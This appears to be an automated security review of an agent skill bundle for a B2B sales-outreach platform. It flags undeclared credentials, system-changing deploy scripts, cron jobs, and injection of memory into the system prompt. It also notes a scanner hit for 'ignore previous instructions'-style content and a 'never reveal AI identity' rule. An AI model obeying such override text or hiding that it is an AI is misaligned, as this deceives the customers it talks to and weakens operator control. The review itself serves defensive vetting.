!
Purpose & Capability
The SKILL.md describes a multi-channel B2B SDR platform that legitimately needs API keys (LLM provider, MemOS, gateway tokens, channel tokens) and host/network configuration. The registry metadata, however, lists no required environment variables or primary credential — that is inconsistent and misleading. Several scripts (deploy.sh, ip-isolate.sh, generate-config.sh) and files reference credentials and system-level settings that a simple 'instruction-only' skill should have declared.
!
Instruction Scope
Runtime instructions explicitly tell the agent/admin to inject dynamic customer memory into the Agent's System Prompt, add post-conversation hooks, run cron jobs, edit ~/.openclaw/openclaw.json, and enable a network-accessible dashboard (default 'lan'). Those actions modify agent/system configuration and override system prompts. The SKILL.md also contains prompts that demand precise JSON-only outputs and guidelines for 'never reveal AI identity' (deceptive behavior). This expands the skill's scope beyond a passive helper and grants it broad ability to change agent/system behaviour.
ℹ
Install Mechanism
There is no formal install spec in the registry (instruction-only), but the bundle contains many shell scripts (deploy/*.sh, install.sh, ip-isolate.sh) that the operator is expected to run. Running those scripts will configure networking (wireproxy/WARP), generate tokens, and write config files. That manual-install approach is acceptable but higher-risk because the scripts execute system/network changes — review them before running and run in an isolated/test environment.
!
Credentials
Although the registry records no required env vars, SKILL.md and code clearly expect multiple secrets: LLM API key(s), MEMOS_API_KEY, GATEWAY token, TELEGRAM_BOT_TOKEN, Gmail/Sheets IDs, and CRM/WhatsApp config. The skill will read/write external memory backends (MemOS, ChromaDB) and maintain conversation archives. Asking for broad credentials is proportionate to a full SDR platform, but the omission from the skill metadata is a significant mismatch and a transparency problem.
!
Persistence & Privilege
The skill instructs installation of cron jobs, post-conversation hooks, and edits to OpenClaw config and system prompts. These operations give the skill persistent, system-level presence (writes to agent config, dashboard token exposure, network binding defaults). 'always' is false, but the requested modifications allow ongoing autonomous behaviour and broad reach; this is expected for a hosted agent but raises privilege concerns and should be limited to a controlled environment.
Scan Findings in Context
[ignore-previous-instructions] unexpected: Pre-scan flagged patterns indicating prompt-injection style content. The SKILL.md instructs that certain outputs be 'only updated JSON' and contains explicit prompts to inject memory into the System Prompt; while memory injection is part of the feature, 'ignore previous instructions' style constructs are not necessary and are high-risk for prompt override attacks.
[system-prompt-override] expected: The skill explicitly tells operators to inject a dynamic 'Customer Memory Snapshot' into the Agent's System Prompt and to configure Post-Conversation hooks. Injecting memory into the system prompt is functionally needed for the anti-amnesia design, but it is a high-risk capability (it can override system-level behavior) and must be handled carefully and explicitly consented to by the operator.
What to consider before installing
Do not run deploy/install scripts until you review them and confirm their origin. Steps to consider before installing:
- Verify the source: the registry lists no homepage and owner identity is opaque. Check the linked GitHub repo and commit history to confirm authenticity.
- Inspect deploy/*.sh and install.sh line-by-line (or run them in a disposable VM/container) to see what they write, what external URLs they contact, and whether they download binaries.
- Prepare least-privilege credentials: create separate API keys/accounts for MemOS/Chroma/LLM and avoid using production credentials during initial tests.
- Be cautious about the dashboard token and default 'lan' binding: set GATEWAY_BIND=loopback or otherwise restrict access before first start.
- Note the skill will inject dynamic memory into the System Prompt and modify OpenClaw config; only allow that in environments where you accept the agent changing system prompts and cron jobs.
- Evaluate privacy/regulatory impact: the agent stores conversation history, quotes, and PII in third-party services (MemOS/Chroma); ensure compliance with data protection rules and retention policies.
- If you need to proceed, test in an isolated sandbox (container or VM) and monitor network traffic during the deploy to detect unexpected exfiltration.
If you want, I can scan the deploy and ip-isolate scripts for specific risky operations (remote downloads, exec of fetched payloads, or writes to system directories) and summarize which lines to review first.
